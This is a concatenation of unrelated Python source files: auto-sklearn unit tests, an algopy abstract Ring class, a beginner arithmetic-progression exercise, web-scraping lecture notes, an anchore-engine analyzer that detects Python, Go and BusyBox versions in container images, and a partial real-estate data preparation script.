failing_model = unittest.mock.Mock() failing_model.fit.side_effect = [ValueError(), ValueError(), None] failing_model.fit_transformer.side_effect = [ ValueError(), ValueError(), (None, {})] failing_model.get_max_iter.return_value = 100 auto = AutoML(backend_api, 20, 5) ensemble_mock = unittest.mock.Mock() ensemble_mock.get_selected_model_identifiers.return_value = [(1, 1, 50.0)] auto.ensemble_ = ensemble_mock for budget_type in [None, 'iterations']: auto._budget_type = budget_type auto.models_ = {(1, 1, 50.0): failing_model} # Make sure a valid 2D array is given to automl X = np.array([1, 2, 3]).reshape(-1, 1) y = np.array([1, 2, 3]) auto.refit(X, y) self.assertEqual(failing_model.fit.call_count, 3) self.assertEqual(failing_model.fit_transformer.call_count, 3) del auto self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_only_loads_ensemble_models(self): def side_effect(ids, *args, **kwargs): return models if ids is identifiers else {} # Add a resampling strategy as this is required by load_models self.automl._resampling_strategy = 'holdout' identifiers = [(1, 2), (3, 4)] models = [42] load_ensemble_mock = unittest.mock.Mock() load_ensemble_mock.get_selected_model_identifiers.return_value = identifiers self.automl._backend.load_ensemble.return_value = load_ensemble_mock self.automl._backend.load_models_by_identifiers.side_effect = side_effect self.automl._load_models() self.assertEqual(models, self.automl.models_) self.assertIsNone(self.automl.cv_models_) self.automl._resampling_strategy = 'cv' models = [42] self.automl._backend.load_cv_models_by_identifiers.side_effect = side_effect self.automl._load_models() self.assertEqual(models, self.automl.cv_models_) def test_check_for_models_if_no_ensemble(self): models = [42] self.automl._backend.load_ensemble.return_value = None self.automl._backend.list_all_models.return_value = models self.automl._disable_evaluator_output = False self.automl._load_models() def test_raises_if_no_models(self): self.automl._backend.load_ensemble.return_value = None self.automl._backend.list_all_models.return_value = [] self.automl._resampling_strategy = 'holdout' self.automl._disable_evaluator_output = False self.assertRaises(ValueError, self.automl._load_models) self.automl._disable_evaluator_output = True self.automl._load_models() def test_fit(self): backend_api = self._create_backend('test_fit') X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') automl = autosklearn.automl.AutoML( backend=backend_api, time_left_for_this_task=20, per_run_time_limit=5, metric=accuracy, ) automl.fit( X_train, Y_train, task=MULTICLASS_CLASSIFICATION, ) score = automl.score(X_test, Y_test) self.assertGreaterEqual(score, 0.8) self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION) del automl self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_delete_non_candidate_models(self): backend_api = self._create_backend( 'test_delete', delete_tmp_folder_after_terminate=False) seed = 555 X, Y, _, _ = putil.get_dataset('iris') automl = autosklearn.automl.AutoML( backend_api, time_left_for_this_task=30, per_run_time_limit=5, ensemble_nbest=3, seed=seed, initial_configurations_via_metalearning=0, resampling_strategy='holdout', include_estimators=['sgd'], include_preprocessors=['no_preprocessing'], metric=accuracy, ) automl.fit(X, Y, task=MULTICLASS_CLASSIFICATION, X_test=X, y_test=Y) # Assert at least one model file has been deleted and that there were no # deletion errors log_file_path = glob.glob(os.path.join( backend_api.temporary_directory, 'AutoML(' + str(seed) + '):*.log')) with open(log_file_path[0]) as log_file: log_content = log_file.read() self.assertIn('Deleted files of non-candidate model', log_content) self.assertNotIn('Failed to delete files of non-candidate model', log_content) self.assertNotIn('Failed to lock model', log_content) # Assert that the files of the models used by the ensemble weren't deleted model_files = backend_api.list_all_models(seed=seed) model_files_idx = set() for m_file in model_files: # Extract the model identifiers from the filename m_file = os.path.split(m_file)[1].replace('.model', '').split('.', 2) model_files_idx.add((int(m_file[0]), int(m_file[1]), float(m_file[2]))) ensemble_members_idx = set(automl.ensemble_.identifiers_) self.assertTrue(ensemble_members_idx.issubset(model_files_idx)) del automl self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_fit_roar(self): def get_roar_object_callback( scenario_dict, seed, ta, ta_kwargs, **kwargs ): """Random online adaptive racing. http://ml.informatik.uni-freiburg.de/papers/11-LION5-SMAC.pdf""" scenario = Scenario(scenario_dict) return ROAR( scenario=scenario, rng=seed, tae_runner=ta, tae_runner_kwargs=ta_kwargs, ) backend_api = self._create_backend('test_fit_roar') X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') automl = autosklearn.automl.AutoML( backend=backend_api, time_left_for_this_task=20, per_run_time_limit=5, initial_configurations_via_metalearning=0, get_smac_object_callback=get_roar_object_callback, metric=accuracy, ) setup_logger() automl._logger = get_logger('test_fit_roar') automl.fit( X_train, Y_train, task=MULTICLASS_CLASSIFICATION, ) score = automl.score(X_test, Y_test) self.assertGreaterEqual(score, 0.8) self.assertEqual(automl._task, MULTICLASS_CLASSIFICATION) del automl self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_binary_score_and_include(self): """ Test fix for binary classification prediction taking the index 1 of second dimension in prediction matrix """ backend_api = self._create_backend('test_binary_score_and_include') data = sklearn.datasets.make_classification( n_samples=400, n_features=10, n_redundant=1, n_informative=3, n_repeated=1, n_clusters_per_class=2, random_state=1) X_train = data[0][:200] Y_train = data[1][:200] X_test = data[0][200:] Y_test = data[1][200:] automl = autosklearn.automl.AutoML( backend_api, 20, 5, include_estimators=['sgd'], include_preprocessors=['no_preprocessing'], metric=accuracy, ) automl.fit(X_train, Y_train, task=BINARY_CLASSIFICATION) self.assertEqual(automl._task, BINARY_CLASSIFICATION) # TODO, the assumption from above is not really tested here # Also, the score method should be removed, it only makes little sense score = automl.score(X_test, Y_test) self.assertGreaterEqual(score, 0.4) del automl self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_automl_outputs(self): backend_api = self._create_backend('test_automl_outputs') X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') name = 'iris' data_manager_file = os.path.join( backend_api.temporary_directory, '.auto-sklearn', 'datamanager.pkl' ) auto = autosklearn.automl.AutoML( backend_api, 20, 5, initial_configurations_via_metalearning=0, seed=100, metric=accuracy, ) setup_logger() auto._logger = get_logger('test_automl_outputs') auto.fit( X=X_train, y=Y_train, X_test=X_test, y_test=Y_test, dataset_name=name, task=MULTICLASS_CLASSIFICATION, ) # pickled data manager (without one hot encoding!) with open(data_manager_file, 'rb') as fh: D = pickle.load(fh) self.assertTrue(np.allclose(D.data['X_train'], X_train)) # Check that all directories are there fixture = ['cv_models', 'true_targets_ensemble.npy', 'start_time_100', 'datamanager.pkl', 'predictions_ensemble', 'ensembles', 'predictions_test', 'models'] self.assertEqual(sorted(os.listdir(os.path.join(backend_api.temporary_directory, '.auto-sklearn'))), sorted(fixture)) # At least one ensemble, one validation, one test prediction and one # model and one ensemble fixture = os.listdir(os.path.join(backend_api.temporary_directory, '.auto-sklearn', 'predictions_ensemble')) self.assertGreater(len(fixture), 0) fixture = glob.glob(os.path.join(backend_api.temporary_directory, '.auto-sklearn', 'models', '100.*.model')) self.assertGreater(len(fixture), 0) fixture = os.listdir(os.path.join(backend_api.temporary_directory, '.auto-sklearn', 'ensembles')) self.assertIn('100.0000000001.ensemble', fixture) # Start time start_time_file_path = os.path.join(backend_api.temporary_directory, '.auto-sklearn', "start_time_100") with open(start_time_file_path, 'r') as fh: start_time = float(fh.read()) self.assertGreaterEqual(time.time() - start_time, 10) del auto self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_do_dummy_prediction(self): datasets = { 'breast_cancer': BINARY_CLASSIFICATION, 'wine': MULTICLASS_CLASSIFICATION, 'diabetes': REGRESSION, } for name, task in datasets.items(): backend_api = self._create_backend('test_do_dummy_prediction') X_train, Y_train, X_test, Y_test = putil.get_dataset(name) datamanager = XYDataManager( X_train, Y_train, X_test, Y_test, task=task, dataset_name=name, feat_type=None, ) auto = autosklearn.automl.AutoML( backend_api, 20, 5, initial_configurations_via_metalearning=25, metric=accuracy, ) setup_logger() auto._logger = get_logger('test_do_dummy_predictions') auto._backend.save_datamanager(datamanager) D = backend_api.load_datamanager() # Check if data manager is correcly loaded self.assertEqual(D.info['task'], datamanager.info['task']) auto._do_dummy_prediction(D, 1) # Ensure that the dummy predictions are not in the current working # directory, but in the temporary directory. self.assertFalse(os.path.exists(os.path.join(os.getcwd(), '.auto-sklearn'))) self.assertTrue(os.path.exists(os.path.join( backend_api.temporary_directory, '.auto-sklearn', 'predictions_ensemble', 'predictions_ensemble_1_1_0.0.npy'))) del auto self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) @unittest.mock.patch('autosklearn.evaluation.ExecuteTaFuncWithQueue.run') def test_fail_if_dummy_prediction_fails(self, ta_run_mock): backend_api = self._create_backend('test_fail_if_dummy_prediction_fails') X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') datamanager = XYDataManager( X_train, Y_train, X_test, Y_test, task=2, feat_type=['Numerical' for i in range(X_train.shape[1])], dataset_name='iris', ) time_for_this_task = 30 per_run_time = 10 auto = autosklearn.automl.AutoML(backend_api, time_for_this_task, per_run_time, initial_configurations_via_metalearning=25, metric=accuracy, ) setup_logger() auto._logger = get_logger('test_fail_if_dummy_prediction_fails') auto._backend._make_internals_directory() auto._backend.save_datamanager(datamanager) # First of all, check that ta.run() is actually called. ta_run_mock.return_value = StatusType.SUCCESS, None, None, "test" auto._do_dummy_prediction(datamanager, 1) ta_run_mock.assert_called_once_with(1, cutoff=time_for_this_task) # Case 1. Check that function raises no error when statustype == success. # ta.run() returns status, cost, runtime, and additional info. ta_run_mock.return_value = StatusType.SUCCESS, None, None, "test" raised = False try: auto._do_dummy_prediction(datamanager, 1) except ValueError: raised = True self.assertFalse(raised, 'Exception raised') # Case 2. Check that if statustype returned by ta.run() != success, # the function raises error. ta_run_mock.return_value = StatusType.CRASHED, None, None, "test" self.assertRaisesRegex(ValueError, 'Dummy prediction failed with run state StatusType.CRASHED ' 'and additional output: test.', auto._do_dummy_prediction, datamanager, 1, ) ta_run_mock.return_value = StatusType.ABORT, None, None, "test" self.assertRaisesRegex(ValueError, 'Dummy prediction failed with run state StatusType.ABORT ' 'and additional output: test.', auto._do_dummy_prediction, datamanager, 1, ) ta_run_mock.return_value = StatusType.TIMEOUT, None, None, "test" self.assertRaisesRegex(ValueError, 'Dummy prediction failed with run state StatusType.TIMEOUT ' 'and additional output: test.', auto._do_dummy_prediction, datamanager, 1, ) ta_run_mock.return_value = StatusType.MEMOUT, None, None, "test" self.assertRaisesRegex(ValueError, 'Dummy prediction failed with run state StatusType.MEMOUT ' 'and additional output: test.', auto._do_dummy_prediction, datamanager, 1, ) ta_run_mock.return_value = StatusType.CAPPED, None, None, "test" self.assertRaisesRegex(ValueError, 'Dummy prediction failed with run state StatusType.CAPPED ' 'and additional output: test.', auto._do_dummy_prediction, datamanager, 1, ) self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) @unittest.mock.patch('autosklearn.smbo.AutoMLSMBO.run_smbo') def test_exceptions_inside_log_in_smbo(self, smbo_run_mock): # Make sure that any exception during the AutoML fit due to # SMAC are properly captured in a log file backend_api = self._create_backend('test_exceptions_inside_log') self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) automl = autosklearn.automl.AutoML( backend_api, 20, 5, metric=accuracy, ) output_file = 'test_exceptions_inside_log.log' setup_logger(output_file=output_file) logger = get_logger('test_exceptions_inside_log') # Create a custom exception to prevent other errors to slip in class MyException(Exception): pass X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') # The first call is on dummy predictor failure message = str(np.random.randint(100)) + '_run_smbo' smbo_run_mock.side_effect = MyException(message) with unittest.mock.patch('autosklearn.automl.AutoML._get_logger') as mock: mock.return_value = logger with self.assertRaises(MyException): automl.fit( X_train, Y_train, task=MULTICLASS_CLASSIFICATION, ) with open(output_file) as f: self.assertTrue(message in f.read()) # Cleanup os.unlink(output_file) self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_load_best_individual_model(self): backend_api = self._create_backend('test_fit') for metric in [log_loss, balanced_accuracy]: X_train, Y_train, X_test, Y_test = putil.get_dataset('iris') automl = autosklearn.automl.AutoML( backend=backend_api, time_left_for_this_task=20, per_run_time_limit=5, metric=metric, ) with unittest.mock.patch( 'autosklearn.ensemble_builder.EnsembleBuilder.run' ) as mock_ensemble_run: mock_ensemble_run.side_effect = MemoryError automl.fit( X_train, Y_train, task=MULTICLASS_CLASSIFICATION, ) # A memory error occurs in the ensemble construction self.assertIsNone(automl._backend.load_ensemble(automl._seed)) # The load model is robust to this and loads the best model automl._load_models() self.assertIsNotNone(automl.ensemble_) # Just 1 model is there for ensemble and all weight must be on it get_models_with_weights = automl.get_models_with_weights() self.assertEqual(len(get_models_with_weights), 1) self.assertEqual(get_models_with_weights[0][0], 1.0) # Match a toy dataset if metric._sign < 0: self.assertLessEqual(automl.score(X_test, Y_test), 0.2) else: self.assertGreaterEqual(automl.score(X_test, Y_test), 0.8) del automl self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_fail_if_feat_type_on_pandas_input(self): """We do not support feat type when pandas is provided as an input """ backend_api = self._create_backend('test_fail_feat_pandas') automl = autosklearn.automl.AutoML( backend=backend_api, time_left_for_this_task=20, per_run_time_limit=5, metric=accuracy, ) X_train = pd.DataFrame({'a': [1, 1], 'c': [1, 2]}) y_train = [1, 0] with self.assertRaisesRegex(ValueError, "feat_type cannot be provided when using pandas"): automl.fit( X_train, y_train, task=BINARY_CLASSIFICATION, feat_type=['Categorical', 'Numerical'], ) self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) def test_fail_if_dtype_changes_automl(self): """We do not support changes in the input type. Once a estimator is fitted, it should not change data type """ backend_api = self._create_backend('test_fail_feat_typechange') automl = autosklearn.automl.AutoML( backend=backend_api, time_left_for_this_task=20, per_run_time_limit=5, metric=accuracy, ) X_train = pd.DataFrame({'a': [1, 1], 'c': [1, 2]}) y_train = [1, 0] automl.InputValidator.validate(X_train, y_train, is_classification=True) with self.assertRaisesRegex(ValueError, "Auto-sklearn previously received features of type"): automl.fit( X_train.to_numpy(), y_train, task=BINARY_CLASSIFICATION, ) self._tearDown(backend_api.temporary_directory) self._tearDown(backend_api.output_directory) if __name__ == "__main__": unittest.main()
2.015625
2
algopy/base_type.py
arthus701/algopy
54
11856
""" This implements an abstrace base class Ring . Rationale: Goal is to separate the datatype specification from the algorithms and containers for the following reasons: 1) It allows to directly use the algorithms *without* overhead. E.g. calling mul(z.data, x.data, y.data) has much less overhead than z = x.__mul__(y). data is to be kept as close as possible to machine primitives. E.g. data is array or tuple of arrays. 2) Potential reuse of an algorithm in several datatypes. 3) Relatively easy to connect high performance algorithms with a very highlevel abstract description. For instance, most programming languages allow calling C-functions. Therefore, the algorithms should be given as void fcn(int A, double B, ...) For instance, the datatype is a truncated Taylor polynomial R[t]/<t^D> of the class Foo. The underlying container is a simple array of doubles. """ import numpy class Ring(object): """ An abstract base class in an attempt to follow the DRY principle. It implements the algebraic class of a ring as defined on http://en.wikipedia.org/wiki/Ring_%28mathematics%29 The idea is that the set is described in data and the operations +,* etc. are implemented as functions that operate on the data. E.g. the factor ring of natural numbers modulo 4, x.data = 3 y.data = 2 then z = add(x,y) is implemented as def add(x,y): return self.__class__((x.data*y.data)%4) and one obtains z.data = 1 Warning: Since this class is only of little value it may be deprecated in the future. """ data = NotImplementedError() def totype(self, x): """ tries to convert x to an object of the class works for : scalar x, numpy.ndarray x Remark: at the moment, scalar x expanded as Ring with the same degree as self though. The reason is a missing implementation that works for graded rings of different degree. Once such implementations exist, this function should be adapted. """ if numpy.isscalar(x): xdata = self.__class__.__zeros_like__(self.data) self.__class__.__scalar_to_data__(xdata, x) return self.__class__(xdata) elif isinstance(x, numpy.ndarray): raise NotImplementedError('sorry, not implemented just yet') elif not isinstance(x, self.__class__): raise NotImplementedError('Cannot convert x\n type(x) = %s but expected type(x) = %s'%(str(type(x)))) else: return x def __add__(self, rhs): rhs = self.totype(rhs) retval = self.__class__(self.__class__.__zeros_like__(self.data)) self.__class__.add(retval.data, self.data, rhs.data) return retval def __sub__(self, rhs): rhs = self.totype(rhs) retval = self.__class__(self.__class__.__zeros_like__(self.data)) self.__class__.sub(retval.data, self.data, rhs.data) return retval def __mul__(self,rhs): rhs = self.totype(rhs) retval = self.__class__(self.__class__.__zeros_like__(self.data)) self.__class__.mul(retval.data, self.data, rhs.data) return retval def __truediv__(self,rhs): rhs = self.totype(rhs) retval = self.__class__(self.__class__.__zeros_like__(self.data)) self.__class__.div(retval.data, self.data, rhs.data) return retval def __radd__(self, lhs): return self + lhs def __rmul__(self, lhs): return self * lhs def zeros_like(self): return self.__class__(self.__class__.__zeros_like__(self.data)) def __str__(self): return str(self.data)
3.578125
4
estrutura-repeticao-while/ex062.py
TacilioRodriguez/Python
0
11857
<filename>estrutura-repeticao-while/ex062.py<gh_stars>0 """ Melhore o Desafio 061, perguntando para o usuário se ele quer mostrar mais alguns termos. O programa encerra quando ele disser que quer mostrar 0 termos. """ primeiro = int(input('Digite o termo: ')) razao = int(input('Digite a razão: ')) termo = primeiro cont = 1 total = 0 mais = 10 while mais != 0: total = total + mais while cont <= total: print('{} -> '.format(termo), end=' ') termo = termo + razao cont = cont + 1 print('Pausa') mais = int(input('Quantos termos você quer mostrar a mais? ')) print('FIM')
3.703125
4
Udemy_PythonBootcamp/Sec15_WebScraping.py
gonzalosc2/LearningPython
0
11858
#################################### # author: <NAME> # course: 2020 Complete Python Bootcamps: From Zero to Hero in Python # purpose: lecture notes # description: Section 15 - Web Scraping # other: N/A #################################### # RULES # 1. always try to get permission before scraping, otherwise I might be blocked # 2. check the laws of whatever country we are operating in (for legal issues) # LIMITATIONS # each website is unique -> so for each website there must exist a Python script # an update to a website might brake my script import requests import bs4 # Grabbing a title result = requests.get("http://example.com") type(result) result.text # bs with lxml tranforms the previous raw html into the following soup = bs4.BeautifulSoup(result.text,'lxml') soup # returns the tag we specified as a list (i.e., there might be more than one) soup.select('title') soup.select('title')[0].getText() soup.select('p') site_paragraphs = soup.select('p') type(site_paragraphs[0]) # not a string, instead is a specialized bs object, # which is why we can do something like call .getText() # Grabbing a class (from CSS) using soup.select() # 'div' : all elements with 'div' tag # '#some_id' : elements containing id='some_id' # '.some_class' : elements containing class='some_class' # 'div span' : any element named span within a div element # 'div > span' : any element named span directly within a div element, with # nothing in between res = requests.get("https://en.wikipedia.org/wiki/Jonas_Salk") soup = bs4.BeautifulSoup(res.text,'lxml') soup.select('.toctext')[0].text soup.select('.toctext')[0].getText() for item in soup.select('.toctext'): print(item.text) # Grabbing an image #soup.select('img') # can return more than what is needeed (it will depend on # the website) soup.select('.thumbimage') jonas_salk = soup.select('.thumbimage')[0] jonas_salk['src'] # we can treat it as a dictionary image_link = requests.get('http://upload.wikimedia.org/wikipedia/commons/thumb/3/3c/Roosevelt_OConnor.jpg/220px-Roosevelt_OConnor.jpg') #image_link.content # raw content of the image which is a binary file #make sure to use the same format that the image has f = open('my_image_image.jpg','wb') # wb means write binary f.write(image_link.content) f.close() # Multiple elements across multiple pages # GOAL: get title of every book with a 2 star rating #Check that this also work with page 1 #http://books.toscrape.com/catalogue/page-2.html base_url = 'http://books.toscrape.com/catalogue/page-{}.html' req = requests.get(base_url.format(1)) soup = bs4.BeautifulSoup(req.text,'lxml') products = soup.select(".product_pod") # always check the length, in this case should be 20 example = products[0] # one way (not useful everytime) 'star-rating Two' in str(example) # another way (checking for the presence of a class) example.select('.star-rating.Three') # if there is a space in a class we should add a dot example.select('.star-rating.Two') # nothing example.select('a')[1]['title'] two_star_titles = [] for n in range(1,51): scrape_url = base_url.format(n) req = requests.get(base_url.format(1)) soup = bs4.BeautifulSoup(req.text,'lxml') books = soup.select(".product_pod") for book in books: if len(book.select('.star-rating.Two')) != 0: two_star_titles.append(book.select('a')[1]['title']) two_star_titles
4.125
4
anchore_engine/analyzers/modules/33_binary_packages.py
dspalmer99/anchore-engine
0
11859
#!/usr/bin/env python3 import sys import os import re import json import traceback import pkg_resources import tarfile from collections import OrderedDict import anchore_engine.analyzers.utils, anchore_engine.utils def get_python_evidence(tfl, member, memberhash, evidence): global binary_package_el fullpath = "/{}".format(member.name) filename = os.path.basename(fullpath) el = {} el.update(binary_package_el) patt_bin = re.match("^python([0-9]+\.[0-9]+)$", filename) patt_lib = re.match("^libpython([0-9]+\.[0-9]+).so.*$", filename) if (patt_bin or patt_lib) and member.isreg(): f_vers = "" if patt_bin: f_vers = patt_bin.group(1) elif patt_lib: f_vers = patt_lib.group(1) with tfl.extractfile(member) as FH: for line in FH.readlines(): subline = line try: the_re = ".*{}\.([0-9]+[-_a-zA-Z0-9]*).*".format(f_vers) patt = re.match(anchore_engine.utils.ensure_bytes(the_re), subline) if patt and f_vers: b_vers = "{}.{}".format(f_vers, anchore_engine.utils.ensure_str(patt.group(1))) if b_vers.startswith(f_vers): el['name'] = 'python' el['version'] = b_vers el['location'] = fullpath evidence['python']['binary'].append( el ) break except Exception as err: raise err elif filename == "patchlevel.h" and member.isreg(): with tfl.extractfile(member) as FH: for line in FH.readlines(): line = line.strip() patt = re.match(b".*#define +PY_VERSION +\"*([0-9\.\-_a-zA-Z]+)\"*", line) if patt: h_vers = anchore_engine.utils.ensure_str(patt.group(1)) el['name'] = 'python' el['version'] = h_vers el['location'] = fullpath evidence['python']['devel'].append(el) break def get_golang_evidence(tfl, member, memberhash, evidence): global binary_package_el fullpath = "/{}".format(member.name) filename = os.path.basename(fullpath) el = {} el.update(binary_package_el) if filename in ['go'] and member.isreg(): with tfl.extractfile(member) as FH: for line in FH.readlines(): subline = line try: the_re = ".*go([0-9]+\.[0-9]+(\.[0-9]+|beta[0-9]+|alpha[0-9]+|rc[0-9]+)*).*" patt = re.match(anchore_engine.utils.ensure_bytes(the_re), subline) if patt: vers = anchore_engine.utils.ensure_str(patt.group(1)) el['name'] = 'go' el['version'] = vers el['location'] = fullpath evidence['go']['binary'].append( el ) break except Exception as err: raise err elif filename == "VERSION" and member.isreg(): with tfl.extractfile(member) as FH: for line in FH.readlines(): line = line.strip() patt = re.match(b".*go([0-9]+\.[0-9]+(\.[0-9]+|beta[0-9]+|alpha[0-9]+|rc[0-9]+)*).*", line) if patt: vers = anchore_engine.utils.ensure_str(patt.group(1)) final_loc = fullpath if memberhash.get(os.path.join(os.path.dirname(member.name), 'bin', 'go'), None): final_loc = os.path.join("/", os.path.dirname(member.name), 'bin', 'go') el['name'] = 'go' el['version'] = vers el['location'] = final_loc evidence['go']['devel'].append( el ) break def get_busybox_evidence(tfl, member, memberhash, distrodict, evidence): global binary_package_el fullpath = "/{}".format(member.name) filename = os.path.basename(fullpath) if filename == "busybox" and (member.isreg() or member.islnk()): # Perform any specific checks using prior metadata if distrodict.get('flavor', "") == 'BUSYB': patt = re.match(".*([0-9]+\.[0-9]+\.[0-9]+).*", distrodict.get('fullversion', "")) if patt: version = anchore_engine.utils.ensure_str(patt.group(1)) el = {} el.update(binary_package_el) el['name'] = 'busybox' el['version'] = version el['location'] = fullpath evidence['busybox']['binary'].append(el) analyzer_name = "package_list" try: config = anchore_engine.analyzers.utils.init_analyzer_cmdline(sys.argv, analyzer_name) except Exception as err: print(str(err)) sys.exit(1) imgname = config['imgid'] imgid = config['imgid_full'] outputdir = config['dirs']['outputdir'] unpackdir = config['dirs']['unpackdir'] squashtar = os.path.join(unpackdir, "squashed.tar") resultlist = {} version_found_map = {} binary_package_el = { 'name': None, 'version': None, 'location': None, 'type': 'binary', 'files': [], 'license': 'N/A', 'origin': 'N/A', 'metadata': json.dumps({}) } try: allfiles = {} if os.path.exists(unpackdir + "/anchore_allfiles.json"): with open(unpackdir + "/anchore_allfiles.json", 'r') as FH: allfiles = json.loads(FH.read()) else: fmap, allfiles = anchore_engine.analyzers.utils.get_files_from_squashtar(os.path.join(unpackdir, "squashed.tar")) with open(unpackdir + "/anchore_allfiles.json", 'w') as OFH: OFH.write(json.dumps(allfiles)) # read in previous analyzer output for helping to increase accuracy of findings fname = os.path.join(outputdir, 'pkgfiles.all') pkgfilesall = anchore_engine.analyzers.utils.read_kvfile_todict(fname) meta = anchore_engine.analyzers.utils.get_distro_from_squashtar(os.path.join(unpackdir, "squashed.tar"), unpackdir=unpackdir) distrodict = anchore_engine.analyzers.utils.get_distro_flavor(meta['DISTRO'], meta['DISTROVERS'], likedistro=meta['LIKEDISTRO']) # set up ordered dictionary structure for the runtimes and evidence types evidence = OrderedDict() for runtime in ['python', 'go', 'busybox']: evidence[runtime] = OrderedDict() for etype in ['binary', 'devel']: evidence[runtime][etype] = [] # Perform a per file routine to evaluate files for gathering binary package version evidence with tarfile.open(os.path.join(unpackdir, "squashed.tar"), mode='r', format=tarfile.PAX_FORMAT) as tfl: alltnames = tfl.getnames() alltfiles = {} for name in alltnames: alltfiles[name] = True memberhash = anchore_engine.analyzers.utils.get_memberhash(tfl) for member in list(memberhash.values()): try: get_python_evidence(tfl, member, memberhash, evidence) except Exception as err: print ("WARN: caught exception evaluating file ({}) for python runtime evidence: {}".format(member.name, str(err))) try: get_golang_evidence(tfl, member, memberhash, evidence) except Exception as err: print ("WARN: caught exception evaluating file ({}) for golang runtime evidence: {}".format(member.name, str(err))) try: get_busybox_evidence(tfl, member, memberhash, distrodict, evidence) except Exception as err: print ("WARN: caught exception evaluating file ({}) for busybox runtime evidence: {}".format(member.name, str(err))) resultlist = {} for runtime in evidence.keys(): #['python', 'go']: for e in evidence[runtime].keys(): #['binary', 'devel']: for t in evidence[runtime][e]: version = t.get('version') location = t.get('location') if location in pkgfilesall: print ("INFO: Skipping evidence {} - file is owned by OS package".format(location)) else: key = "{}-{}".format(runtime, version) if key not in version_found_map: result = {} result.update(binary_package_el) result.update(t) result['metadata'] = json.dumps({"evidence_type": e}) resultlist[location] = json.dumps(result) version_found_map[key] = True try: squashtar = os.path.join(unpackdir, "squashed.tar") hints = anchore_engine.analyzers.utils.get_hintsfile(unpackdir, squashtar) for pkg in hints.get('packages', []): pkg_type = pkg.get('type', "").lower() if pkg_type == 'binary': try: pkg_key, el = anchore_engine.analyzers.utils._hints_to_binary(pkg) try: resultlist[pkg_key] = json.dumps(el) except Exception as err: print ("WARN: unable to add binary package ({}) from hints - excpetion: {}".format(pkg_key, err)) except Exception as err: print ("WARN: bad hints record encountered - exception: {}".format(err)) except Exception as err: print ("WARN: problem honoring hints file - exception: {}".format(err)) except Exception as err: import traceback traceback.print_exc() print("WARN: analyzer unable to complete - exception: " + str(err)) if resultlist: ofile = os.path.join(outputdir, 'pkgs.binary') anchore_engine.analyzers.utils.write_kvfile_fromdict(ofile, resultlist) #print ("RESULT: {}".format(resultlist)) sys.exit(0)
2.125
2
SF-home-price-prediction/src/preparation.py
apthomas/SF-home-price-prediction
0
11860
import pandas as pd import numpy as np import csv import urllib.request import json from datetime import datetime from datetime import timedelta from sklearn.preprocessing import MinMaxScaler import web_scrapers import os def load_real_estate_data(filename, state_attr, state): df = pd.read_csv(filename, encoding="ISO-8859-1") df = df.loc[df[state_attr] == state] return df def load_data(filenames): df_list=[] for i in range(0, len(filenames)): df = pd.read_csv(filenames[i], encoding="ISO-8859-1") df_list.append(df) return df_list def create_zipcode_list(filenames): zipcodes = {} # structured with within 5, 10 miles from another zipcode zip_list = [] for i in range(0, len(filenames)): with open(filenames[i], 'r', encoding='utf-8-sig') as f: reader = csv.reader(f) your_list = list(reader) for z in range(0, len(your_list)): zipcodes[your_list[z][0]] = [], [] zip_list.append(your_list[z][0]) return zipcodes, zip_list def wrangle_real_estate_data(df, zip_list, drop_columns): df = df[df['RegionName'].isin(zip_list)] df = df.drop(drop_columns, axis=1) return df def wrangle_IPO_data(df, zip_list): df['Date Filed'] = pd.to_datetime(df['Date Filed'], format='%Y-%m-%d') df['Lockup Expiration Date'] = pd.to_datetime(df['Lockup Expiration Date'], errors='coerce', format='%m/%d/%Y') df = df[df['Zipcode'].isin(zip_list)] df = df.drop(['Lockup Expiration Date'], axis=1) df['Lockup Expiration Date'] = df['Date Filed'] + timedelta(days=180) df = df[df['Date Filed']> df['Date Filed'].min()+ timedelta(days=366)] return df def wrangle_census_data(df_census_econ, df_census_dem, zip_list, census_econ_columns, census_dem_columns): df_census_econ.rename(columns={'Id2': 'Zipcode'}, inplace=True) df_census_econ.rename( columns={'Percent; EMPLOYMENT STATUS - Civilian labor force - Unemployment Rate': 'Unemployment Rate'}, inplace=True) df_census_econ.rename(columns={ 'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Less than $10,000': 'l10000'}, inplace=True) df_census_econ.rename(columns={ 'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $10,000 to $14,999': 'l15000'}, inplace=True) df_census_econ.rename(columns={ 'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $15,000 to $24,999': 'l25000'}, inplace=True) df_census_econ.rename(columns={ 'Estimate; COMMUTING TO WORK - Mean travel time to work (minutes)': 'Mean Travel Time to Work Estimate (minutes)'}, inplace=True) df_census_econ.rename(columns={ 'Percent; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - $200,000 or more': 'Percent of Households with Income Greater than $200,000'}, inplace=True) df_census_econ.rename(columns={ 'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Median household income (dollars)': 'Median Household Income Estimate (dollars)'}, inplace=True) df_census_econ.rename(columns={ 'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Total households - Mean household income (dollars)': 'Mean Household Income Estimate (dollars)'}, inplace=True) df_census_econ.rename(columns={ 'Estimate; INCOME AND BENEFITS (IN 2017 INFLATION-ADJUSTED DOLLARS) - Per capita income (dollars)': 'Per Capita Income Estimate (dollars)'}, inplace=True) 